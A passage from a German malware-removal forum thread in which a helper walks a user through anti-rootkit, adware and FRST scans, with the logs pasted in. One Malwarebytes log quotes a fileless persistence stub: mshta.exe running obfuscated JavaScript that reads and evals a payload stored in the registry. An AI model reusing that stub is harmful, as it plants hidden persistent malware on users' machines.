   Generatorinstanz-ID: {2b4a2dd8-1805-4ac5-9545-b2b4e5183952}

Error: (08/06/2017 12:54:05 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/06/2017 12:53:54 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/06/2017 12:33:21 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddWin32ServiceFiles: Unable to back up image of service IObitUnSvr since QueryServiceConfig API failed

System Error:
Das System kann die angegebene Datei nicht finden.
.

Error: (08/06/2017 12:33:21 AM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {aed6dc58-88ad-4623-913e-10f437d01ec2}

Error: (08/06/2017 12:31:23 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddWin32ServiceFiles: Unable to back up image of service IObitUnSvr since QueryServiceConfig API failed

System Error:
Das System kann die angegebene Datei nicht finden.
.

Error: (08/06/2017 12:31:21 AM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {aed6dc58-88ad-4623-913e-10f437d01ec2}

Error: (08/06/2017 12:23:06 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/06/2017 12:22:46 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.

Error: (08/06/2017 12:22:31 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">.


Systemfehler:
=============
Error: (08/06/2017 01:13:53 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (08/06/2017 01:11:46 AM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als
Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser
Konfiguration nicht gestartet zu sein.

Error: (08/06/2017 01:11:46 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.

Error: (08/06/2017 01:08:38 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Digital Wave Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (08/06/2017 01:06:31 AM) (Source: NETLOGON) (EventID: 3095) (User: )
Description: Dieser Computer ist als Mitglied einer Arbeitsgruppe konfiguriert, nicht als
Mitglied einer Domäne. Der Anmeldedienst braucht bei dieser
Konfiguration nicht gestartet zu sein.

Error: (08/06/2017 01:06:30 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.

Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (08/06/2017 01:05:37 AM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON)
Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.


CodeIntegrity:
===================================
  Date: 2017-07-28 18:15:03.249
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-28 18:15:02.562
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-07-05 21:28:31.069
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-20 13:12:31.840
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-06 20:55:49.642
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:43:22.953
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-20 20:06:11.606
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:40:43.841
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-19 20:18:44.959
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-5820K CPU @ 3.30GHz
Prozentuale Nutzung des RAM: 19%
Installierter physikalischer RAM: 16279.21 MB
Verfügbarer physikalischer RAM: 13164 MB
Summe virtueller Speicher: 18711.21 MB
Verfügbarer virtueller Speicher: 15354.91 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:70.63 GB) NTFS
Drive f: (Volume) (Fixed) (Total:3725.96 GB) (Free:3666.44 GB) NTFS
Drive g: (Volume) (Fixed) (Total:3725.96 GB) (Free:2787.95 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: BE291492)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=449 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7452 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================
         

Alt 07.08.2017, 10:47   #20
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



Malwarebytes Anti-Rootkit (MBAR)

Downloade dir bitte Malwarebytes Anti-Rootkit Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.
  • Starte bitte die mbar.exe.
  • Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
  • Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
  • Klicke auf den CleanUp Button und erlaube den Neustart.
  • Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
  • Nach dem Neustart starte die mbar.exe erneut.
  • Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.
Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers



Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 07.08.2017, 18:57   #21
Lost_Viking
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



Da hat ihm was in der Registrierung nicht gepasst...
Code:
ATTFilter
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.08.07.08
  rootkit: v2017.08.02.01

Windows 10 x64 NTFS
Internet Explorer 11.483.15063.0
**** :: SILENTDRAGON [administrator]

07.08.2017 19:29:32
mbar-log-2017-08-07 (19-29-32).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 302574
Time elapsed: 10 minute(s), 8 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 2
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\QOFQOW\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [92f2f09a06a34aece13457cd59a8be42]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\5B53A\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [83012a602b7e1f1727684cdefb06b34d]

Registry Values Detected: 2
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\qofqow\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: "C:\WINDOWS\system32\mshta.exe" "javascript:qCMtl0iJ="KTSd4";Zc0=new ActiveXObject("WScript.Shell");PaNndH09="ye7m06u";uOK7n=Zc0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");fbZu1="pzwHtm";eval(uOK7n);CXc9F7L="bpC";" -> Delete on reboot. [92f2f09a06a34aece13457cd59a8be42]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\5b53a\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: "C:\WINDOWS\system32\mshta.exe" "javascript:S5lrz="f310qYGw";Vo0=new ActiveXObject("WScript.Shell");ou8rBoG="TXQ";EKfm37=Vo0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");EFQEQ1s="B1036niD";eval(EKfm37);phzPz7y7="m";" -> Delete on reboot. [83012a602b7e1f1727684cdefb06b34d]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)
         
Das zweite Scan ohne Befund:
Code:
ATTFilter
Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.08.07.08
  rootkit: v2017.08.02.01

Windows 10 x64 NTFS
Internet Explorer 11.483.15063.0
***** :: SILENTDRAGON [administrator]

07.08.2017 19:45:23
mbar-log-2017-08-07 (19-45-23).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 301793
Time elapsed: 8 minute(s), 10 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)
         

Alt 07.08.2017, 21:41   #22
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



Adware/Junkware/Toolbars entfernen

Alte Versionen von adwCleaner und falls vorhanden JRT vorher löschen, danach neu runterladen auf den Desktop!
Virenscanner jetzt vor dem Einsatz dieser Tools bitte komplett deaktivieren!




1. Schritt: adwCleaner v7.0.1.0

Downloade Dir bitte AdwCleaner auf deinen Desktop (Bebilderte Anleitung).
  • Schließe alle offenen Programme und Browser.
  • Starte die adwcleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Werkzeuge > Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • Tracing Schlüssel
    • Prefetch Dateien
    • Proxy
    • Winsock
    • IE Richtlinien
    • Chrome Richtlinien
  • Bestätige die Auswahl mit Ok.
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist. Am Ende des Suchlaufs öffnet sich automatisch eine Logdatei. Schließe diese.
  • Klicke nun auf Löschen (auch dann wenn AdwCleaner sagt, dass nichts gefunden wurde) und bestätige auftretende Hinweise mit Ok.
  • Klicke am Ende der Bereinigung auf Jetzt neu starten. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).



2. Schritt: JRT - Junkware Removal Tool

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 07.08.2017, 23:00   #23
Lost_Viking
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

adwcleaner_7.0.1.0 SCAN



Code:
ATTFilter
# AdwCleaner 7.0.1.0 - Logfile created on Mon Aug 07 21:51:40 2017
# Updated on 2017/05/08 by Malwarebytes 
# Running on Windows 10 Home (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

Deleted: C:\Windows\System32\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
Deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Users\*****\AppData\LocalLow\IObit\Advanced SystemCare
Deleted: C:\Users\*****\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Users\*****\AppData\Local\YSearchUtil
Deleted: C:\ProgramData\IObit\ASCDownloader
Deleted: C:\Users\All Users\IObit\ASCDownloader
Deleted: C:\ProgramData\GPCWValidator
Deleted: C:\Users\All Users\GPCWValidator
Deleted: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Deleted: C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A}
Deleted: C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705}
Deleted: C:\ProgramData\{EAAB5A83-3809-4B0E-83A6-E4B0DBF2157E}
Deleted: C:\ProgramData\{FD6F83C0-EC70-4581-8361-C70CD1AA4B98}


***** [ Files ] *****

Deleted: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Deleted: C:\Users\All Users\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Deleted: C:\Windows\System32\lavasofttcpservice.dll
Deleted: C:\Windows\SysWOW64\lavasofttcpservice.dll
Deleted: C:\Windows\SysNative\LavasoftTcpService64.dll
Deleted: C:\Windows\Reimage.ini


***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

Deleted: [Key] - HKLM\SOFTWARE\IOBIT\ASC
Deleted: [Key] - HKLM\SOFTWARE\ussc-pr
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted: [Value] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|Advanced SystemCare 10
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Deleted: [Key] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Deleted: [Key] - HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Deleted: [Key] - HKLM\SOFTWARE\Reimage
Deleted: [Key] - HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Reimage
Deleted: [Key] - HKCU\Software\Reimage
Deleted: [Key] - HKLM\SOFTWARE\Auslogics


***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

Plugin deleted: MSN Homepage & Bing Search Engine - 


*************************

::Tracing keys deleted
::Winsock settings cleared
::Prefetch files deleted
::Proxy settings cleared
::IE policies deleted
::Chrome policies deleted
::Additional Actions: 0



*************************

C:/AdwCleaner/AdwCleaner[C1].txt - [7019 B] - [2015/11/3 1:16:48]
C:/AdwCleaner/AdwCleaner[S1].txt - [4242 B] - [2015/11/3 1:16:24]


########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt ##########
         
Code:
ATTFilter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64 
Ran by **** (Administrator) on 07.08.2017 at 23:57:46,77
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 10 

Successfully deleted: C:\ProgramData\pdfforge (Folder) 
Successfully deleted: C:\ProgramData\productdata (Folder) 
Successfully deleted: C:\Users\****\AppData\Roaming\productdata (Folder) 
Successfully deleted: C:\WINDOWS\system32\Tasks\Driver Booster SkipUAC (****) (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\StartMenu8_Start (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_Install_Martin_W (Task)
Successfully deleted: C:\WINDOWS\system32\Tasks\Uninstaller_SkipUac_Martin_W (Task)
Successfully deleted: C:\WINDOWS\Tasks\StartMenu8_Start.job (Task) 
Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_Install_Martin_W.job (Task) 
Successfully deleted: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Martin_W.job (Task) 



Registry: 1 

Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 07.08.2017 at 23:58:47,94
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         

Alt 07.08.2017, 23:09   #24
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



Okay, beide Tools bitte zwecks Kontrolle wiederholen.
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 08.08.2017, 17:03   #25
Lost_Viking
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



Ok hier nochmal adwcleaner
Code:
ATTFilter
# AdwCleaner 7.0.1.0 - Logfile created on Tue Aug 08 15:59:40 2017
# Updated on 2017/05/08 by Malwarebytes 
# Running on Windows 10 Home (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

No malicious services deleted.

***** [ Folders ] *****

No malicious folders deleted.

***** [ Files ] *****

No malicious files deleted.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks deleted.

***** [ Registry ] *****

No malicious registry entries deleted.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries deleted.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries deleted.

*************************

::Tracing keys deleted
::Winsock settings cleared
::Prefetch files deleted
::Proxy settings cleared
::IE policies deleted
::Chrome policies deleted
::Additional Actions: 0



*************************

C:/AdwCleaner/AdwCleaner[C1].txt - [1456 B] - [2015/11/3 1:16:48]
C:/AdwCleaner/AdwCleaner[S1].txt - [1079 B] - [2015/11/3 1:16:24]


########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt ##########
         
und JRT
Code:
ATTFilter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64 
Ran by Martin W*** (Administrator) on 08.08.2017 at 18:04:00,30
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 1 

Successfully deleted: C:\ProgramData\productdata (Folder) 



Registry: 0 





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 08.08.2017 at 18:05:00,48
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         
und nochmal.....
Code:
ATTFilter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64 
Ran by Martin W*** (Administrator) on 08.08.2017 at 18:08:32,26
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 0 




Registry: 0 





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 08.08.2017 at 18:09:26,98
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         

Geändert von Lost_Viking (08.08.2017 um 17:12 Uhr)

Alt 08.08.2017, 22:02   #26
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

UPC meldet: Virus, würmer werden über meine IP versendet



Ich brauche neue FRST-Logs . Haken setzen bei addition.txt dann auf Untersuchen klicken.

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 09.08.2017, 18:06   #27
Lost_Viking
 
UPC meldet: Virus, würmer werden über meine IP versendet - Standard

FRST



Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 09-08-2017
durchgeführt von *** (Administrator) auf SILENTDRAGON (09-08-2017 18:59:08)
Gestartet von C:\Users\***\Desktop
Geladene Profile: *** (Verfügbare Profile: ***)
Platform: Windows 7 Ultimate (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Electronic Arts) G:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
